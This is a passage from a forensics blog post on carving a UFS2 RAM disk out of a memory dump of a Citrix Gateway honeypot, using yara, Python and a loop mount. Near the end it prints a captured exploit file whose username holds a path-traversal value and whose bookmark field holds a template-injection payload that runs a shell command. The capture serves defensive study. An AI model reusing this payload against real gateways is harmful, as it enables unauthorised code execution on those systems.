00000250  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000280  00 00 00 00 57 45 56 82  57 61 08 00 00 20 00 00  |....WEV.Wa... ..|
00000290  00 00 00 00 f0 4f 0d 00  10 00 00 00 00 00 00 00  |.....O..........|
000002a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000002b0  00 00 00 00 00 50 0d 00  00 00 00 00 00 00 00 00  |.....P..........|
000002c0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00010000  00 00 00 00 00 00 00 00  28 00 00 00 30 00 00 00  |........(...0...|
[/code]
We can see from that output that the first sector (the first block of boot code) is all 0x00 bytes, which makes sense, because there's no point putting boot code on a RAM disk.
Now the second sector (sector 1) at offset 0x0200 is the BSD disk label. That has what looks like a label (amnesiac) of some description in it. So we need to look through the memory dump for 512 zero bytes, then the BSD disk label which begins with ‘WEV\x82’ followed by four zero bytes and the string ‘amnesiac’, then (128 * 512 + 1372 – (512 + 16)) == 66,380 bytes followed by the UFS2 magic number. Let me explain that calculation:
128 * 512 skips the first 128 sectors which gets us to the start of the UFS2 superblock.
+1372 bytes offset of the UFS2 magic number into the superblock
– (512 + 16) bytes being the 512 bytes of sector 0 plus the first 16 bytes of sector 1 which gets us to the end of the ‘amnesiac’ label. We subtract this because we are calculating the number of bytes after the ‘amnesiac’ label and before the UFS2 magic number.
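Just to double-check that arithmetic before baking it into a rule, in a Python shell:

[code autoformat='false']
>>> 128 * 512 + 1372 - (512 + 16)
66380
[/code]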
Now you could just load the core file into a hex editor such as bvi, and use it to search for all the occurrences of the UFS magic number, or the ‘amnesiac’ label, or you can take the I’ve-been-working-in-IT-too-long-and-am-sick-of-doing-things-manually approach, which also has the advantage of being scriptable. There is a useful tool for searching for patterns of bytes in files, and that’s yara. Let’s create a yara rule.
rule ufs2_filesystem {
strings:
$ufs2filesystem = { 57 45 56 82 00 00 00 00 61 6d 6e 65 73 69 61 63 [66380] 19 01 54 19 }
condition:
$ufs2filesystem
}
Yara evaluates the rule's condition. In this case, the condition consists of a single variable, being a string to search for. That causes the rule to match if that string is found in any of the input files.
The string, in this case, is a sequence of hex bytes which represent ‘WEV\x82\x00\x00\x00\x00amnesiac’ followed by what yara calls a ‘jump’. The jump tells yara to skip a number of bytes, in this case 66,380 bytes (being the gap that we calculated above, between the end of the ‘amnesiac’ label and the start of the UFS2 file system magic number). The last four hex bytes of the string are the UFS2 file system magic number, in little-endian (least significant byte first) byte order.
If we now run that yara rule on our memory dump file, we very nicely get a single match. The -s option tells yara to output the offset of any strings that are found (which is why I coded the rule using one long string rather than how I did it originally, which was by using a few separate strings combined in the condition section of the rule):
[code autolinks='false']
$ yara -s ufs.yara /var/tmp/NetScaler-VPX.dump
ufs2_filesystem /var/tmp/NetScaler-VPX.dump
0x15a0d28:$ufs2filesystem: 57 45 56 82 00 00 00 00 61 6D 6E 65 73 69 61 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...
[/code]
We could have tried to make the rule more efficient by removing the jump, which would also mean removing the UFS2 file system magic number. If we do that, though, we get multiple matches, which we'd then have to wade through manually; and if we're going to script this, we'd need to script that extra checking too:
[code autolinks='false']
$ yara -s ufsshort.yara /var/tmp/NetScaler-VPX.dump
ufs2_filesystem /var/tmp/NetScaler-VPX.dump
0x15a0d28:$ufs2filesystem: 57 45 56 82 00 00 00 00 61 6D 6E 65 73 69 61 63
0x1e5249b8:$ufs2filesystem: 57 45 56 82 00 00 00 00 61 6D 6E 65 73 69 61 63
0x1e5269b8:$ufs2filesystem: 57 45 56 82 00 00 00 00 61 6D 6E 65 73 69 61 63
0x1e5289b8:$ufs2filesystem: 57 45 56 82 00 00 00 00 61 6D 6E 65 73 69 61 63
[/code]
Right. So back to the longer yara rule, which tells us that it has found something, at offset 0x15a0d28 in the memory dump file, that matches the start of our RAM disk image. Now we still have a little work to do. Remember how the ‘WEV\x82’ was at the start of sector 1, not at the start of the RAM disk image? We need to subtract 512 (0x200) bytes from that offset to get the start of what will hopefully be our RAM disk image in the memory dump. Note that you need to capitalise the letters in hex digits for the bc(1) command:
[code autolinks='false']
$ bc
...
ibase=16
15A0D28 - 200
22678312
[/code]
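Since I mentioned scriptability, here's roughly how I'd glue those steps together. This is a sketch that shells out to the yara binary (rather than using the yara-python bindings) and parses its -s output:

[code autoformat='false']
import re
import subprocess

DUMP = "/var/tmp/NetScaler-VPX.dump"

out = subprocess.run(["yara", "-s", "ufs.yara", DUMP],
                     capture_output=True, text=True, check=True).stdout

# match lines look like: 0x15a0d28:$ufs2filesystem: 57 45 56 82 ...
m = re.search(r"0x([0-9a-fA-F]+):\$ufs2filesystem", out)
if not m:
    raise SystemExit("no UFS2 RAM disk found in the dump")

# the disk label matched by the rule sits in sector 1, so the file
# system itself starts 512 bytes earlier
offset = int(m.group(1), 16) - 512
print("sudo mount -o ro,loop,offset=%d,ufstype=ufs2 -t ufs %s /mnt"
      % (offset, DUMP))
[/code]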
Now, the moment of truth — do we have a valid RAM disk image at that location in the memory dump file? Linux has a nifty way of letting you mount file systems in the middle of files, so let’s give it a go:
[code autolinks='false']
$ sudo mount -o ro,loop,offset=22678312,ufstype=ufs2 -t ufs /var/tmp/NetScaler-VPX.dump /mnt
$ ls -la /mnt
total 48
drwxr-xr-x  20 root  root   512 Mar  8 10:27 .
drwxr-xr-x  24 root  root  4096 Mar 12 22:58 ..
drwxr-xr-x   2 root  root  1024 Nov 29 06:29 bin
lrwxr-xr-x   1 root  root    33 Mar  8 10:27 colorful -> /netscaler/portal/themes/colorful
drwxr-xr-x   3 root  root   512 Nov 29 06:45 compat
lrwxr-xr-x   1 root  root    15 Mar  8 10:27 configdb -> /flash/configdb
drwxr-xr-x   2 root  root   512 Nov 29 06:29 dev
drwxr-xr-x   8 root  root  1536 Mar  8 10:27 etc
drwxr-xr-x   2 root  root   512 Nov 29 06:29 flash
drwxr-xr-x   2 root  root   512 Nov 29 06:29 home
drwxr-xr-x   3 root  root  2048 Nov 29 06:45 lib
drwxr-xr-x   2 root  root   512 Nov 29 06:42 libexec
drwxr-xr-x   2 root  root   512 Nov 29 06:29 mnt
drwxr-xr-x  16 root  root  5632 Nov 29 06:59 netscaler
drwxr-xr-x 260 root  root  3584 Mar  8 10:27 nscache
lrwxr-xr-x   1 root  root    16 Mar  8 10:27 nsconfig -> /flash/nsconfig/
lrwxr-xr-x   1 root  root    33 Mar  8 10:27 optional -> /netscaler/portal/themes/optional
drwxr-xr-x   2 root  root   512 Nov 29 06:29 proc
drwxr-xr-x   2 root  root   512 Nov 29 06:29 root
drwxr-xr-x   2 root  root  2048 Nov 29 06:29 sbin
drwxrwxr-x   2 root  tty    512 Nov 29 06:29 .snap
drwxrwxrwt   3 root  root  1024 Mar  8 10:30 tmp
drwxr-xr-x  10 root  root   512 Nov 29 06:45 usr
drwxr-xr-x   8 root  root   512 Nov 29 06:29 var
[/code]
… and now for the 'rabbit', the f9a7585e.xml file near the bottom of the listing:
[code autolinks='false']
$ ls -lart /mnt/netscaler/portal/templates/
total 168
-r--r--r--  1 nobody  root   4637 Nov 29 06:45 styles.css
-r--r--r--  1 nobody  root   1991 Nov 29 06:45 wrapper.tmpl
-r--r--r--  1 nobody  root    863 Nov 29 06:45 tips.html
-r--r--r--  1 nobody  root   7012 Nov 29 06:45 themes.html
-r--r--r--  1 nobody  root   4404 Nov 29 06:45 rmft.html
-r--r--r--  1 nobody  root   4398 Nov 29 06:45 rmbm.html
-r--r--r--  1 nobody  root    326 Nov 29 06:45 resources.tmpl
-r--r--r--  1 nobody  root    216 Nov 29 06:45 preferences.html
-r--r--r--  1 nobody  root   1340 Nov 29 06:45 ping.html
-r--r--r--  1 nobody  root   9063 Nov 29 06:45 newbm.html
-r--r--r--  1 nobody  root   1496 Nov 29 06:45 navwrapper.tmpl
-r--r--r--  1 nobody  root   7015 Nov 29 06:45 navthemes.html
-r--r--r--  1 nobody  root    167 Nov 29 06:45 missing.html
-r--r--r--  1 nobody  root   1496 Nov 29 06:45 menu.tmpl
-r--r--r--  1 nobody  root     82 Nov 29 06:45 loadresources.tmpl
-r--r--r--  1 nobody  root    489 Nov 29 06:45 j_services.html
-r--r--r--  1 nobody  root  28918 Nov 29 06:45 homepage.html
-r--r--r--  1 nobody  root  22646 Nov 29 06:45 homepage2.html
-r--r--r--  1 nobody  root      0 Nov 29 06:45 globalFS.tmpl
-r--r--r--  1 nobody  root      0 Nov 29 06:45 globalBK.tmpl
-r--r--r--  1 nobody  root   4078 Nov 29 06:45 ftlist.html
-r--r--r--  1 nobody  root    876 Nov 29 06:45 f_services.html
-r--r--r--  1 nobody  root    368 Nov 29 06:45 filetransfer.html
-r--r--r--  1 nobody  root    503 Nov 29 06:45 error.html
-r--r--r--  1 nobody  root    743 Nov 29 06:45 err2006.html
-r--r--r--  1 nobody  root    754 Nov 29 06:45 err2005.html
-r--r--r--  1 nobody  root    711 Nov 29 06:45 err2004.html
-r--r--r--  1 nobody  root    764 Nov 29 06:45 err2002.html
-r--r--r--  1 nobody  root   3111 Nov 29 06:45 chpwdsuccess.html
-r--r--r--  1 nobody  root  10325 Nov 29 06:45 changepwd.html
-r--r--r--  1 nobody  root   6712 Nov 29 06:45 bookmark.html
-r-xr-xr-x  1 nobody  root    159 Nov 29 06:45 boilerplate.tmpl
drwxr-xr-x 10 nobody  root    512 Nov 29 06:45 ..
-rw-r--r--  1 root    root    333 Mar  6 11:47 f9a7585e.xml
drwxr-xr-x  2 nobody  root   1024 Mar  8 10:37 .
[/code]
Reading the exploit artefact file:
$ cat /mnt/netscaler/portal/templates/f9a7585e.xml
<?xml version="1.0" encoding="UTF-8"?>
<user username="../../../netscaler/portal/templates/f9a7585e">
<bookmarks>
<bookmark UI_inuse="" descr="[% template.new('BLOCK' = 'print `ls -l`') %]" title="f9a7585e" url="http://example.com" />
</bookmarks>
<escbk>
</escbk>
<filesystems></filesystems>
<style></style>
</user>
Mission accomplished — we've successfully managed to capture a Citrix Gateway exploit by extracting it from a RAM disk inside a memory dump of a running Citrix Gateway virtual machine. Plus we learnt a little bit about UFS file systems in the process.
There was a potential issue that I thought of, and that is whether or not the FreeBSD kernel uses a file system cache for RAM disks. That would introduce a delay between a file being written to the RAM disk, and it showing up in the RAM disk image in the memory dump.
I did a few tests which basically consisted of writing a file to the RAM disk and creating the memory dump as soon as I could after writing the file. The file showed up in each of the test dumps, suggesting that writes to the RAM disk aren’t cached (or not for any reasonable amount of time anyway).
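Each test ran roughly along these lines (paraphrased; note that the offset has to be re-derived with the yara rule for each new dump, as there's no guarantee the RAM disk lands at the same spot in every core file):

[code autoformat='false']
# on the guest: write a marker file to the RAM disk (/tmp lives on /dev/md0)
root@ns# date > /tmp/cachetest

# on the host, immediately afterwards:
$ virsh -c qemu:///system 'dump NetScaler-VPX /var/tmp/test.dump --memory-only'

# find the offset with the yara rule as before, subtract 512, then:
$ sudo mount -o ro,loop,offset=<offset>,ufstype=ufs2 -t ufs /var/tmp/test.dump /mnt
$ cat /mnt/tmp/cachetest
[/code]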
It doesn’t make sense to create a file system cache for a RAM disk because it will just use up more RAM and be largely ineffective (the reasoning behind a file system cache is that RAM is quicker to write to than disk). It was more a test to see if there was a generic file system layer (like VFS for instance) that was caching all writes regardless of the underlying disk implementation.
Why?!
Now, one question that sprung to mind when I got to this point, was why go to all that bother? Why not just scp (secure copy — copy over SSH) the files off?!
Admittedly it was partly because of the challenge — whether or not I could actually pull it off, plus it enabled me to dabble in a bit of memory forensics, which is something that I’m interested in but haven’t yet done much of.
Another reason is that this method gives us a forensic image of the RAM disk. That means that it doesn't just preserve the file(s) of interest, but rather it preserves the whole file system — it preserves all the time stamps (modified time, last accessed time, inode change time), including those of the directories; it preserves the inodes (which can provide some forensic insight); and it preserves unallocated and slack space, making it potentially possible to recover deleted files.
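If you want to dig into those inodes and time stamps, one option is Brian's own Sleuth Kit. A sketch, assuming a Sleuth Kit build with UFS2 support and GNU dd; the image size is the superblock's 218,112 blocks × the 2,048-byte fragment size from the file(1) output earlier (UFS counts its size in fragments):

[code autoformat='false']
# carve the RAM disk out of the memory dump
$ dd if=/var/tmp/NetScaler-VPX.dump of=/var/tmp/md0-carved.ufs \
     iflag=skip_bytes,count_bytes skip=22678312 count=446693376

# list files (including deleted ones) and inspect an inode
$ fls -r -f ufs2 /var/tmp/md0-carved.ufs
$ istat -f ufs2 /var/tmp/md0-carved.ufs <inode>
[/code]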
In this situation we kind of knew the attack and what it was going to do, which meant that we knew what files to look for and to copy off. However, what if we were setting this honeypot up to capture unknown attacks, where we wouldn’t know what files were going to be created/modified/deleted? That is where a forensic image of the RAM disk would be awfully useful.
With a forensic image of the RAM disk it is possible to compare the RAM disk image from the memory dump, with that from the original kernel image, to see which files were created/modified/deleted, but this blog post is long enough as it is.